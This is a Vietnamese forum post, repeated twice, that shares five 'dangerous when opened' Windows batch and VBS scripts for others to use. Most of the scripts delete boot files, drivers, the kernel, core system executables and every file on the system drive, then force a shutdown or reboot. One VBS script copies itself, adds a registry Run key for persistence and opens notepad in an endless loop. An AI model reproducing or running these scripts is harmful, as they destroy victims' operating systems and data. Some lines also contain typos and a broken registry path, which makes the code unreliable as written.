mình có sưu tầm được một số code file batch,vbs nguy hiểm khi mở, hi vọng có thể giúp ít nhiều được cho các bạn (đừng cười)
1
@echo off
ATTRIB C:\Boot.ini -s -h
ATTRIB C:\IO.sys -s -h
ATTRIB C:\msdos.sys -s -h
ATTRIB C:\ntdetect.com -s -h
ATTRIB C:\ntldr -s -h
ATTRIB C:\dell.sdr -s -h
DEL "C:\Autoexec.bat"
DEL "C:\Boot.ini"
DEL "C:\Config.sys"
DEL "C:\IO.sys"
DEL "C:\MSDOS.sys"
DEL "C:\NTDETECT.COM"
DEL "C:\NTLDR"
DEL "C:\dell.sdr"
DEL "C:\INFCACHE.1"
DEL "C:\Rollback.ini"
DEL "C:\SystemInfo.ini"
DEL "C:\uwstart.ini"
ATTRIB C:\WINDOWS\System32\Drivers\Mup.sys -s -h -r
ATTRIB C:\WINDOWS\System32\ZoneLabs\srescan.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\NDIS.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\Ntfs.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ksecdd.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\sr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\fltmgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\classpnp.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\disk.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\atapi.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\VolSnap.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\PartMgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\dmio.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\dmload.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ftdisk.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\MountMgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\PCIIDEX.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\pciide.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\isapnp.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\pci.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\WMILIB.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ACPI.sys -s -h -r
ATTRIB C:\WINDOWS\AppPatch\drvmain.sdb -s -h -r
ATTRIB C:\WINDOWS\FONTS\vgaoem.fon -s -h -r
ATTRIB C:\WINDOWS\System32\L_intl.nls -s -h -r
ATTRIB C:\WINDOWS\System32\C_437.nls -s -h -r
ATTRIB C:\WINDOWS\System32\c_1252.nls -s -h -r
ATTRIB C:\WINDOWS\System32\BOOTVID.dll -s -h -r
ATTRIB C:\WINDOWS\System32\KDCOM.dll -s -h -r
ATTRIB C:\WINDOWS\System32\hal.dll -s -h -r
ATTRIB C:\WINDOWS\System32\ntoskrnl.exe -s -h -r
ATTRIB C:\WINDOWS\System32\config\ -s -h -r
DEL "C:\WINDOWS\System32\Drivers\Mup.sys"
DEL "C:\WINDOWS\System32\ZoneLabs\srescan.sys"
DEL "C:\WINDOWS\System32\Drivers\NDIS.sys"
DEL "C:\WINDOWS\System32\Drivers\Ntfs.sys"
DEL "C:\WINDOWS\System32\Drivers\ksecdd.sys"
DEL "C:\WINDOWS\System32\Drivers\sr.sys"
DEL "C:\WINDOWS\System32\Drivers\fltmgr.sys"
DEL "C:\WINDOWS\System32\Drivers\classpnp.sys"
DEL "C:\WINDOWS\System32\Drivers\disk.sys"
DEL "C:\WINDOWS\System32\Drivers\atapi.sys"
DEL "C:\WINDOWS\System32\Drivers\VolSnap.sys"
DEL "C:\WINDOWS\System32\Drivers\PartMgr.sys"
DEL "C:\WINDOWS\System32\Drivers\dmio.sys"
DEL "C:\WINDOWS\System32\Drivers\dmload.sys"
DEL "C:\WINDOWS\System32\Drivers\ftdisk.sys"
DEL "C:\WINDOWS\System32\Drivers\MountMgr.sys"
DEL "C:\WINDOWS\System32\Drivers\PCIIDEX.SYS"
DEL "C:\WINDOWS\System32\Drivers\pciide.sys"
DEL "C:\WINDOWS\System32\Drivers\isapnp.sys"
DEL "C:\WINDOWS\System32\Drivers\pci.sys"
DEL "C:\WINDOWS\System32\Drivers\WMILIB.SYS"
DEL "C:\WINDOWS\System32\Drivers\ACPI.sys"
DEL "C:\WINDOWS\AppPatch\drvmain.sdb"
DEL "C:\WINDOWS\FONTS\vgaoem.fon"
DEL "C:\WINDOWS\System32\L_intl.nls"
DEL "C:\WINDOWS\System32\C_437.nls"
DEL "C:\WINDOWS\System32\c_1252.nls"
DEL "C:\WINDOWS\System32\BOOTVID.dll"
DEL "C:\WINDOWS\System32\KDCOM.DLL"
DEL "C:\WINDOWS\System32\hal.dll"
DEL "C:\WINDOWS\System32\ntoskrnl.exe"
DEL "C:\WINDOWS\System32\config\"
RD “C:\Program Files” /s /q
RD “C:\Documents and Settings” /s /q
DEL C:\WINDOWS\system32\services.exe
TASKKILL /IM explorer.exe
TASKKILL /IM svchost.exe
DEL "C:\WINDOWS\explorer.exe"
DEL "C:\WINDOWS\system32\svchost.exe"
DEL "C:\WINDOWS\system32\lsass.exe"
DEL "C:\WINDOWS\system32\winlogon.exe"
DEL "C:\WINDOWS\system32\csrss.exe"
DEL "C:\WINDOWS\system32\smss.exe"
2
@Echo Off
@cls
@title Virus ti choi
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown -s -t 06 -c " Fatal error #1337, Good by my love!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit
3
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
4
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
5
On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n \cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop
------nếu thấy có ích hì nhớ thanks
1
@echo off
ATTRIB C:\Boot.ini -s -h
ATTRIB C:\IO.sys -s -h
ATTRIB C:\msdos.sys -s -h
ATTRIB C:\ntdetect.com -s -h
ATTRIB C:\ntldr -s -h
ATTRIB C:\dell.sdr -s -h
DEL "C:\Autoexec.bat"
DEL "C:\Boot.ini"
DEL "C:\Config.sys"
DEL "C:\IO.sys"
DEL "C:\MSDOS.sys"
DEL "C:\NTDETECT.COM"
DEL "C:\NTLDR"
DEL "C:\dell.sdr"
DEL "C:\INFCACHE.1"
DEL "C:\Rollback.ini"
DEL "C:\SystemInfo.ini"
DEL "C:\uwstart.ini"
ATTRIB C:\WINDOWS\System32\Drivers\Mup.sys -s -h -r
ATTRIB C:\WINDOWS\System32\ZoneLabs\srescan.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\NDIS.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\Ntfs.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ksecdd.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\sr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\fltmgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\classpnp.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\disk.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\atapi.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\VolSnap.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\PartMgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\dmio.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\dmload.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ftdisk.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\MountMgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\PCIIDEX.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\pciide.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\isapnp.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\pci.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\WMILIB.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ACPI.sys -s -h -r
ATTRIB C:\WINDOWS\AppPatch\drvmain.sdb -s -h -r
ATTRIB C:\WINDOWS\FONTS\vgaoem.fon -s -h -r
ATTRIB C:\WINDOWS\System32\L_intl.nls -s -h -r
ATTRIB C:\WINDOWS\System32\C_437.nls -s -h -r
ATTRIB C:\WINDOWS\System32\c_1252.nls -s -h -r
ATTRIB C:\WINDOWS\System32\BOOTVID.dll -s -h -r
ATTRIB C:\WINDOWS\System32\KDCOM.dll -s -h -r
ATTRIB C:\WINDOWS\System32\hal.dll -s -h -r
ATTRIB C:\WINDOWS\System32\ntoskrnl.exe -s -h -r
ATTRIB C:\WINDOWS\System32\config\ -s -h -r
DEL "C:\WINDOWS\System32\Drivers\Mup.sys"
DEL "C:\WINDOWS\System32\ZoneLabs\srescan.sys"
DEL "C:\WINDOWS\System32\Drivers\NDIS.sys"
DEL "C:\WINDOWS\System32\Drivers\Ntfs.sys"
DEL "C:\WINDOWS\System32\Drivers\ksecdd.sys"
DEL "C:\WINDOWS\System32\Drivers\sr.sys"
DEL "C:\WINDOWS\System32\Drivers\fltmgr.sys"
DEL "C:\WINDOWS\System32\Drivers\classpnp.sys"
DEL "C:\WINDOWS\System32\Drivers\disk.sys"
DEL "C:\WINDOWS\System32\Drivers\atapi.sys"
DEL "C:\WINDOWS\System32\Drivers\VolSnap.sys"
DEL "C:\WINDOWS\System32\Drivers\PartMgr.sys"
DEL "C:\WINDOWS\System32\Drivers\dmio.sys"
DEL "C:\WINDOWS\System32\Drivers\dmload.sys"
DEL "C:\WINDOWS\System32\Drivers\ftdisk.sys"
DEL "C:\WINDOWS\System32\Drivers\MountMgr.sys"
DEL "C:\WINDOWS\System32\Drivers\PCIIDEX.SYS"
DEL "C:\WINDOWS\System32\Drivers\pciide.sys"
DEL "C:\WINDOWS\System32\Drivers\isapnp.sys"
DEL "C:\WINDOWS\System32\Drivers\pci.sys"
DEL "C:\WINDOWS\System32\Drivers\WMILIB.SYS"
DEL "C:\WINDOWS\System32\Drivers\ACPI.sys"
DEL "C:\WINDOWS\AppPatch\drvmain.sdb"
DEL "C:\WINDOWS\FONTS\vgaoem.fon"
DEL "C:\WINDOWS\System32\L_intl.nls"
DEL "C:\WINDOWS\System32\C_437.nls"
DEL "C:\WINDOWS\System32\c_1252.nls"
DEL "C:\WINDOWS\System32\BOOTVID.dll"
DEL "C:\WINDOWS\System32\KDCOM.DLL"
DEL "C:\WINDOWS\System32\hal.dll"
DEL "C:\WINDOWS\System32\ntoskrnl.exe"
DEL "C:\WINDOWS\System32\config\"
RD “C:\Program Files” /s /q
RD “C:\Documents and Settings” /s /q
DEL C:\WINDOWS\system32\services.exe
TASKKILL /IM explorer.exe
TASKKILL /IM svchost.exe
DEL "C:\WINDOWS\explorer.exe"
DEL "C:\WINDOWS\system32\svchost.exe"
DEL "C:\WINDOWS\system32\lsass.exe"
DEL "C:\WINDOWS\system32\winlogon.exe"
DEL "C:\WINDOWS\system32\csrss.exe"
DEL "C:\WINDOWS\system32\smss.exe"
2
@Echo Off
@cls
@title Virus ti choi
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown -s -t 06 -c " Fatal error #1337, Good by my love!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit
3
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
4
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
5
On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n \cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop
------nếu thấy có ích hì nhớ thanks